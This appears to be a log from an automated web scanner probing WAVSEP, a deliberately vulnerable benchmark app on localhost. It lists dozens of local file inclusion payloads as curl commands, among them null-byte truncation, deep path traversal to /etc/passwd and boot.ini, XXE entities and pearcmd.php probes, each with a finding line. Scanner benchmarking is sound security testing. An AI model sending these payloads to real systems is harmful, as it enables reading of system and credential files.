GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=.depdb HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=.depdb"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=.depdb%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=.depdb%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=pearcmd.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=pearcmd.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=pearcmd.php%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=pearcmd.php%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case24-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"

